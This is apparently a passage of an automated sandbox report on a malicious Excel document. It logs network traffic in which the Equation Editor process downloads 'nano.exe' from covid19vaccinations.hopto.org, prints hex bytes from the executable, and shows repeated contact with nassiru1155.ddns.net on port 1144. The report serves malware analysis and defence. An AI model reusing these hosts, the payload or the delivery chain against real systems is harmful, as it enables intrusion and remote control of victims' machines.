Apr 12, 2021 08:02:45.830549002 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:45.830575943 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:45.830579996 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:45.830598116 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:45.830615044 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:45.830621004 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:45.830620050 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:45.830632925 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:45.830642939 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:45.830651999 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:45.830665112 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:45.830682993 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:45.830684900 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:45.830698013 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:45.830705881 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:45.830722094 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:45.830816984 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:45.830842018 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:45.830862999 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:45.830878973 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:45.830899000 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:45.830916882 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:45.830935955 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:45.830955029 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:45.830955029 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:45.830965042 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:45.830969095 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:45.830971003 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:45.830980062 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:45.831001997 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:45.831020117 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:45.831039906 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:45.831043959 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:45.831054926 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:45.831058025 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:45.831060886 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:45.831063032 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:45.831065893 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:45.831068993 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:45.831083059 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:45.831087112 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:45.831099033 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:45.831119061 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:45.831120968 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:45.831135988 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:45.831137896 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:45.831141949 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:45.831156969 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:45.831157923 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:45.831171989 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:45.831177950 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:45.831187963 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:45.831197023 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:45.831207037 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:45.831214905 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:45.831229925 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:45.831238031 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:45.831254959 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:45.831259966 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:45.831279993 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:45.831296921 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:45.831300020 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:45.831306934 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:45.831320047 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:45.831321955 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:45.831340075 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:45.831351995 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:45.831362963 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:45.831365108 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:45.831376076 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:45.831383944 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:45.831394911 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:45.831407070 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:45.831423044 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:45.831429005 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:45.831448078 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:45.831456900 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:45.831469059 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:45.831474066 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:45.831487894 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:45.831490040 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:45.831504107 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:45.831511021 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:45.831527948 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:45.831531048 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:45.831549883 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:45.831551075 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:45.831563950 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:45.831573009 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:45.831583023 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:45.831613064 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:46.283127069 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:55.529107094 CEST	49168	1144	192.168.2.22	79.134.225.30
Apr 12, 2021 08:02:58.539140940 CEST	49168	1144	192.168.2.22	79.134.225.30
Apr 12, 2021 08:03:04.547249079 CEST	49168	1144	192.168.2.22	79.134.225.30
Apr 12, 2021 08:03:16.607012987 CEST	49169	1144	192.168.2.22	79.134.225.30
Apr 12, 2021 08:03:19.632378101 CEST	49169	1144	192.168.2.22	79.134.225.30
Apr 12, 2021 08:03:25.638710022 CEST	49169	1144	192.168.2.22	79.134.225.30
Apr 12, 2021 08:03:35.563194036 CEST	49170	1144	192.168.2.22	79.134.225.30
Apr 12, 2021 08:03:38.572410107 CEST	49170	1144	192.168.2.22	79.134.225.30
Apr 12, 2021 08:03:44.579444885 CEST	49170	1144	192.168.2.22	79.134.225.30
Apr 12, 2021 08:04:05.268353939 CEST	49171	1144	192.168.2.22	79.134.225.30
Apr 12, 2021 08:04:08.277417898 CEST	49171	1144	192.168.2.22	79.134.225.30
Apr 12, 2021 08:04:14.283869028 CEST	49171	1144	192.168.2.22	79.134.225.30
Apr 12, 2021 08:04:22.727001905 CEST	49172	1144	192.168.2.22	79.134.225.30
Apr 12, 2021 08:04:25.735197067 CEST	49172	1144	192.168.2.22	79.134.225.30

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Apr 12, 2021 08:02:43.628073931 CEST	52197	53	192.168.2.22	8.8.8.8
Apr 12, 2021 08:02:43.688879967 CEST	53	52197	8.8.8.8	192.168.2.22
Apr 12, 2021 08:03:52.190840960 CEST	53099	53	192.168.2.22	8.8.8.8
Apr 12, 2021 08:03:52.249336958 CEST	53	53099	8.8.8.8	192.168.2.22
Apr 12, 2021 08:03:52.249811888 CEST	53099	53	192.168.2.22	8.8.8.8
Apr 12, 2021 08:03:52.298599958 CEST	53	53099	8.8.8.8	192.168.2.22
Apr 12, 2021 08:03:52.364267111 CEST	52838	53	192.168.2.22	8.8.4.4
Apr 12, 2021 08:03:52.421586990 CEST	53	52838	8.8.4.4	192.168.2.22
Apr 12, 2021 08:03:52.441411972 CEST	61200	53	192.168.2.22	8.8.8.8
Apr 12, 2021 08:03:52.500174999 CEST	53	61200	8.8.8.8	192.168.2.22
Apr 12, 2021 08:03:52.500545025 CEST	61200	53	192.168.2.22	8.8.8.8
Apr 12, 2021 08:03:52.557529926 CEST	53	61200	8.8.8.8	192.168.2.22
Apr 12, 2021 08:03:56.612014055 CEST	49548	53	192.168.2.22	8.8.8.8
Apr 12, 2021 08:03:56.674223900 CEST	53	49548	8.8.8.8	192.168.2.22
Apr 12, 2021 08:03:56.714565992 CEST	55627	53	192.168.2.22	8.8.4.4
Apr 12, 2021 08:03:56.774833918 CEST	53	55627	8.8.4.4	192.168.2.22
Apr 12, 2021 08:03:56.792395115 CEST	56009	53	192.168.2.22	8.8.8.8
Apr 12, 2021 08:03:56.841265917 CEST	53	56009	8.8.8.8	192.168.2.22
Apr 12, 2021 08:03:56.842029095 CEST	56009	53	192.168.2.22	8.8.8.8
Apr 12, 2021 08:03:56.903650045 CEST	53	56009	8.8.8.8	192.168.2.22
Apr 12, 2021 08:03:56.904478073 CEST	56009	53	192.168.2.22	8.8.8.8
Apr 12, 2021 08:03:56.961539030 CEST	53	56009	8.8.8.8	192.168.2.22
Apr 12, 2021 08:04:00.988939047 CEST	61865	53	192.168.2.22	8.8.8.8
Apr 12, 2021 08:04:01.047529936 CEST	53	61865	8.8.8.8	192.168.2.22
Apr 12, 2021 08:04:01.081367016 CEST	55171	53	192.168.2.22	8.8.4.4
Apr 12, 2021 08:04:01.139133930 CEST	53	55171	8.8.4.4	192.168.2.22
Apr 12, 2021 08:04:01.156198025 CEST	52496	53	192.168.2.22	8.8.8.8
Apr 12, 2021 08:04:01.204818964 CEST	53	52496	8.8.8.8	192.168.2.22
Apr 12, 2021 08:04:01.205420017 CEST	52496	53	192.168.2.22	8.8.8.8
Apr 12, 2021 08:04:01.264777899 CEST	53	52496	8.8.8.8	192.168.2.22

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Apr 12, 2021 08:02:43.628073931 CEST	192.168.2.22	8.8.8.8	0xa07b	Standard query (0)	covid19vaccinations.hopto.org	A (IP address)	IN (0x0001)
Apr 12, 2021 08:03:52.190840960 CEST	192.168.2.22	8.8.8.8	0xe55	Standard query (0)	nassiru1155.ddns.net	A (IP address)	IN (0x0001)
Apr 12, 2021 08:03:52.249811888 CEST	192.168.2.22	8.8.8.8	0xe55	Standard query (0)	nassiru1155.ddns.net	A (IP address)	IN (0x0001)
Apr 12, 2021 08:03:52.364267111 CEST	192.168.2.22	8.8.4.4	0x63b2	Standard query (0)	nassiru1155.ddns.net	A (IP address)	IN (0x0001)
Apr 12, 2021 08:03:52.441411972 CEST	192.168.2.22	8.8.8.8	0x34db	Standard query (0)	nassiru1155.ddns.net	A (IP address)	IN (0x0001)
Apr 12, 2021 08:03:52.500545025 CEST	192.168.2.22	8.8.8.8	0x34db	Standard query (0)	nassiru1155.ddns.net	A (IP address)	IN (0x0001)
Apr 12, 2021 08:03:56.612014055 CEST	192.168.2.22	8.8.8.8	0xf56c	Standard query (0)	nassiru1155.ddns.net	A (IP address)	IN (0x0001)
Apr 12, 2021 08:03:56.714565992 CEST	192.168.2.22	8.8.4.4	0x6ba1	Standard query (0)	nassiru1155.ddns.net	A (IP address)	IN (0x0001)
Apr 12, 2021 08:03:56.792395115 CEST	192.168.2.22	8.8.8.8	0xba3c	Standard query (0)	nassiru1155.ddns.net	A (IP address)	IN (0x0001)
Apr 12, 2021 08:03:56.842029095 CEST	192.168.2.22	8.8.8.8	0xba3c	Standard query (0)	nassiru1155.ddns.net	A (IP address)	IN (0x0001)
Apr 12, 2021 08:03:56.904478073 CEST	192.168.2.22	8.8.8.8	0xba3c	Standard query (0)	nassiru1155.ddns.net	A (IP address)	IN (0x0001)
Apr 12, 2021 08:04:00.988939047 CEST	192.168.2.22	8.8.8.8	0xfe1a	Standard query (0)	nassiru1155.ddns.net	A (IP address)	IN (0x0001)
Apr 12, 2021 08:04:01.081367016 CEST	192.168.2.22	8.8.4.4	0x12ef	Standard query (0)	nassiru1155.ddns.net	A (IP address)	IN (0x0001)
Apr 12, 2021 08:04:01.156198025 CEST	192.168.2.22	8.8.8.8	0x9c51	Standard query (0)	nassiru1155.ddns.net	A (IP address)	IN (0x0001)
Apr 12, 2021 08:04:01.205420017 CEST	192.168.2.22	8.8.8.8	0x9c51	Standard query (0)	nassiru1155.ddns.net	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Apr 12, 2021 08:02:43.688879967 CEST	8.8.8.8	192.168.2.22	0xa07b	No error (0)	covid19vaccinations.hopto.org		13.235.115.155	A (IP address)	IN (0x0001)
Apr 12, 2021 08:03:52.249336958 CEST	8.8.8.8	192.168.2.22	0xe55	Name error (3)	nassiru1155.ddns.net	none	none	A (IP address)	IN (0x0001)
Apr 12, 2021 08:03:52.298599958 CEST	8.8.8.8	192.168.2.22	0xe55	Name error (3)	nassiru1155.ddns.net	none	none	A (IP address)	IN (0x0001)
Apr 12, 2021 08:03:52.421586990 CEST	8.8.4.4	192.168.2.22	0x63b2	Name error (3)	nassiru1155.ddns.net	none	none	A (IP address)	IN (0x0001)
Apr 12, 2021 08:03:52.500174999 CEST	8.8.8.8	192.168.2.22	0x34db	Name error (3)	nassiru1155.ddns.net	none	none	A (IP address)	IN (0x0001)
Apr 12, 2021 08:03:52.557529926 CEST	8.8.8.8	192.168.2.22	0x34db	Name error (3)	nassiru1155.ddns.net	none	none	A (IP address)	IN (0x0001)
Apr 12, 2021 08:03:56.674223900 CEST	8.8.8.8	192.168.2.22	0xf56c	Name error (3)	nassiru1155.ddns.net	none	none	A (IP address)	IN (0x0001)
Apr 12, 2021 08:03:56.774833918 CEST	8.8.4.4	192.168.2.22	0x6ba1	Name error (3)	nassiru1155.ddns.net	none	none	A (IP address)	IN (0x0001)
Apr 12, 2021 08:03:56.841265917 CEST	8.8.8.8	192.168.2.22	0xba3c	Name error (3)	nassiru1155.ddns.net	none	none	A (IP address)	IN (0x0001)
Apr 12, 2021 08:03:56.903650045 CEST	8.8.8.8	192.168.2.22	0xba3c	Name error (3)	nassiru1155.ddns.net	none	none	A (IP address)	IN (0x0001)
Apr 12, 2021 08:03:56.961539030 CEST	8.8.8.8	192.168.2.22	0xba3c	Name error (3)	nassiru1155.ddns.net	none	none	A (IP address)	IN (0x0001)
Apr 12, 2021 08:04:01.047529936 CEST	8.8.8.8	192.168.2.22	0xfe1a	Name error (3)	nassiru1155.ddns.net	none	none	A (IP address)	IN (0x0001)
Apr 12, 2021 08:04:01.139133930 CEST	8.8.4.4	192.168.2.22	0x12ef	Name error (3)	nassiru1155.ddns.net	none	none	A (IP address)	IN (0x0001)
Apr 12, 2021 08:04:01.204818964 CEST	8.8.8.8	192.168.2.22	0x9c51	Name error (3)	nassiru1155.ddns.net	none	none	A (IP address)	IN (0x0001)
Apr 12, 2021 08:04:01.264777899 CEST	8.8.8.8	192.168.2.22	0x9c51	Name error (3)	nassiru1155.ddns.net	none	none	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

covid19vaccinations.hopto.org

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.22	49167	13.235.115.155	80	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Timestamp	kBytes transferred	Direction	Data
Apr 12, 2021 08:02:43.867336988 CEST	0	OUT	GET /nano.exe HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Host: covid19vaccinations.hopto.org Connection: Keep-Alive
Apr 12, 2021 08:02:44.030188084 CEST	2	IN	HTTP/1.1 200 OK Date: Mon, 12 Apr 2021 06:02:45 GMT Server: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.4.16 Last-Modified: Mon, 12 Apr 2021 05:41:25 GMT ETag: "c3e00-5bfbff6ea5e4b" Accept-Ranges: bytes Content-Length: 802304 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: application/x-msdownload Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 85 dd 73 60 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 50 00 00 32 0b 00 00 0a 01 00 00 00 00 00 92 50 0b 00 00 20 00 00 00 60 0b 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 a0 0c 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 40 50 0b 00 4f 00 00 00 00 60 0b 00 ec 07 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 0c 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 98 30 0b 00 00 20 00 00 00 32 0b 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 ec 07 01 00 00 60 0b 00 00 08 01 00 00 34 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 80 0c 00 00 02 00 00 00 3c 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 74 50 0b 00 00 00 00 00 48 00 00 00 02 00 05 00 1c 7d 00 00 64 75 00 00 03 00 00 00 01 00 00 06 80 f2 00 00 c0 5d 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1b 30 02 00 1f 00 00 00 00 00 00 00 00 00 28 1e 00 00 0a 28 1f 00 00 0a 00 de 02 00 dc 00 28 07 00 00 06 02 6f 20 00 00 0a 00 2a 00 01 10 00 00 02 00 01 00 0e 0f 00 02 00 00 00 00 aa 00 02 16 28 21 00 00 0a 00 02 16 28 22 00 00 0a 00 02 17 28 23 00 00 0a 00 02 16 28 24 00 00 0a 00 02 16 28 25 00 00 0a 00 2a 4e 00 02 28 09 00 00 06 6f ed 00 00 06 28 26 00 00 0a 00 2a 26 00 02 28 27 00 00 0a 00 2a ce 73 28 00 00 0a 80 01 00 00 04 73 29 00 00 0a 80 02 00 00 04 73 2a 00 00 0a 80 03 00 00 04 73 2b 00 00 0a 80 04 00 00 04 73 2c 00 00 0a 80 05 00 00 04 2a 00 00 00 13 30 01 00 10 00 00 00 01 00 00 11 00 7e 01 00 00 04 6f 2d 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 02 00 00 11 00 7e 02 00 00 04 6f 2e 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 03 00 00 11 00 7e 03 00 00 04 6f 2f 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 04 00 00 11 00 7e 04 00 00 04 6f 30 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 05 00 00 11 00 7e 05 00 00 04 6f 31 00 00 0a 0a 2b 00 06 2a 13 30 02 00 3c 00 00 00 06 00 00 11 00 7e 06 00 00 04 14 28 32 00 00 0a 0b 07 2c 21 72 01 00 00 70 d0 05 00 00 02 28 33 00 00 0a 6f 34 00 00 0a 73 35 00 00 0a 0c 08 80 06 00 00 04 00 00 7e 06 00 00 04 0a 2b 00 06 2a 13 30 01 00 0b 00 00 00 07 00 00 11 00 7e 07 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELs`P2P `@ @@PO` H.text0 2 `.rsrc`4@@.reloc<@BtPH}du]0(((o (!("(#($(%N(o(&&('s(s)ss+s,0~o-+0~o.+0~o/+0~o0+0~o1+0<~(2,!rp(3o4s5~+0~
Apr 12, 2021 08:02:44.030231953 CEST	3	IN	Data Raw: 00 04 0a 2b 00 06 2a 22 00 02 80 07 00 00 04 2a 13 30 03 00 26 00 00 00 08 00 00 11 00 28 0b 00 00 06 72 27 00 00 70 7e 07 00 00 04 6f 36 00 00 0a 28 37 00 00 0a 0b 07 74 25 00 00 01 0a 2b 00 06 2a 00 00 13 30 03 00 26 00 00 00 08 00 00 11 00 28 Data Ascii: +"0&(r'p~o6(7t%+0&(rIp~o6(7t%+s(8ts9(7(:0(o;,(o<*0e~,M~(=
Apr 12, 2021 08:02:44.030258894 CEST	4	IN	Data Raw: 1e 00 00 06 6f 56 00 00 0a 02 6f 22 00 00 06 6f 57 00 00 0a 00 02 6f 1e 00 00 06 6f 56 00 00 0a 02 6f 20 00 00 06 6f 57 00 00 0a 00 02 6f 1e 00 00 06 20 d8 01 00 00 1f 6b 73 58 00 00 0a 6f 59 00 00 0a 00 02 6f 1e 00 00 06 72 43 01 00 70 6f 5a 00 Data Ascii: oVo"oWooVo oWo ksXoYorCpoZo as[o\oo]o"oao" CsXoYo"rQpoZo"9s[o\o"o]o"repo^o"o_o
Apr 12, 2021 08:02:44.030287027 CEST	6	IN	Data Raw: 0a 02 6f 28 00 00 06 6f 57 00 00 0a 00 02 28 56 00 00 0a 02 6f 26 00 00 06 6f 57 00 00 0a 00 02 28 56 00 00 0a 02 6f 1e 00 00 06 6f 57 00 00 0a 00 02 28 56 00 00 0a 02 6f 1c 00 00 06 6f 57 00 00 0a 00 02 72 c9 02 00 70 28 5a 00 00 0a 00 02 72 c9 Data Ascii: o(oW(Vo&oW(VooW(VooWrp(Zrpoioojo$okoojoolo(ojo(ol(j(l&{+"}&{+"}&{+"}*&{
Apr 12, 2021 08:02:44.195743084 CEST	7	IN	Data Raw: 6f 1c 00 00 06 6f 3d 00 00 06 00 00 00 02 6f 30 00 00 06 6f 7f 00 00 0a 0d 09 2c 2a 02 7b 0c 00 00 04 02 6f 20 00 00 06 6f 80 00 00 0a 6f 3f 00 00 06 00 02 7b 0c 00 00 04 02 6f 20 00 00 06 6f 3d 00 00 06 00 00 00 02 6f 2c 00 00 06 6f 7f 00 00 0a Data Ascii: oo=o0o,{o oo?{o o=o,o,%{o?{o oo={o&ooAo4o*(0{+b(A}(P0
Apr 12, 2021 08:02:44.195807934 CEST	9	IN	Data Raw: 00 2a 00 00 13 30 03 00 41 00 00 00 00 00 00 00 00 02 28 3c 00 00 06 02 7b 1d 00 00 04 6f 9c 00 00 0a 00 02 28 3c 00 00 06 16 6f 98 00 00 0a 00 02 28 3c 00 00 06 17 6f 9d 00 00 0a 00 02 02 28 3c 00 00 06 02 7b 1e 00 00 04 28 42 00 00 06 00 2a 00 Data Ascii: 0A(<{o(<o(<o(<{(B0 (G,+(M(O*0r{oVo+ot:oo-ur,uroL{o{r-p
Apr 12, 2021 08:02:44.195846081 CEST	10	IN	Data Raw: 07 72 41 05 00 70 6f b1 00 00 0a 00 07 1a 6f b2 00 00 0a 00 73 b3 00 00 0a 0d 07 6f b4 00 00 0a 09 6f b5 00 00 0a 26 09 72 5d 05 00 70 6f b6 00 00 0a 00 09 1f 10 6f b7 00 00 0a 00 09 20 d0 07 00 00 6f b8 00 00 0a 00 09 1c 6f b9 00 00 0a 00 06 6f Data Ascii: rApoosoo&r]poo oooo&or]poooooorwp(ob<%(oooorwp(ob(o*mG
Apr 12, 2021 08:02:44.195899963 CEST	11	IN	Data Raw: 00 00 0a 0d 07 6f b4 00 00 0a 09 6f b5 00 00 0a 26 09 72 1b 06 00 70 6f b6 00 00 0a 00 09 1f 0b 6f b7 00 00 0a 00 09 17 6f b9 00 00 0a 00 09 72 29 06 00 70 72 4f 06 00 70 72 4f 06 00 70 15 15 28 c0 00 00 0a 28 c1 00 00 0a 8c 8b 00 00 01 6f c2 00 Data Ascii: oo&rpooor)prOprOp((ooo&or]poooooorwp(ob<%(oooorwp(ob(o*
Apr 12, 2021 08:02:44.195945978 CEST	13	IN	Data Raw: 0a 00 11 05 1f 0b 6f b7 00 00 0a 00 11 05 1c 6f b9 00 00 0a 00 73 b3 00 00 0a 13 05 09 6f b4 00 00 0a 11 05 6f b5 00 00 0a 26 11 05 72 9b 06 00 70 6f b6 00 00 0a 00 11 05 1f 0b 6f b7 00 00 0a 00 11 05 17 6f b9 00 00 0a 00 11 05 06 8c 7b 00 00 01 Data Ascii: oosoo&rpooo{osoo&rpoodoo{ooooo(or]pooooo
Apr 12, 2021 08:02:44.195990086 CEST	14	IN	Data Raw: 70 6f b6 00 00 0a 00 11 05 1f 0b 6f b7 00 00 0a 00 11 05 17 6f b9 00 00 0a 00 11 05 07 8c 7b 00 00 01 6f c2 00 00 0a 00 08 6f aa 00 00 0a 00 08 6f c5 00 00 0a 13 06 09 11 06 6f c6 00 00 0a 00 00 09 6f ba 00 00 0a 28 c7 00 00 0a 13 04 02 6f 91 00 Data Ascii: pooo{ooooo(oy%oo%rp%(%rp%((oboD%(oooorwp(obo(o*
Apr 12, 2021 08:02:44.196031094 CEST	15	IN	Data Raw: 00 00 73 58 00 00 0a 6f 59 00 00 0a 00 02 6f 81 00 00 06 1a 73 96 00 00 0a 6f cd 00 00 0a 00 02 6f 81 00 00 06 72 33 0a 00 70 6f 5a 00 00 0a 00 02 6f 81 00 00 06 1f 70 1f 1c 73 5b 00 00 0a 6f 5c 00 00 0a 00 02 6f 81 00 00 06 16 6f 5d 00 00 0a 00 Data Ascii: sXoYosoor3poZops[o\oo]orOpo^oo_ooorgp"Asoo]sXoYosoorpoZods[o\oo

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: EXCEL.EXE PID: 1144 Parent PID: 584

General

Start time:	08:01:54
Start date:	12/04/2021
Path:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
Wow64 process (32bit):	false
Commandline:	'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Imagebase:	0x13f9e0000
File size:	27641504 bytes
MD5 hash:	5FB0A0F93382ECD19F5F499A5CAA59F0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: EQNEDT32.EXE PID: 1320 Parent PID: 584

General

Start time:	08:02:19
Start date:	12/04/2021
Path:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
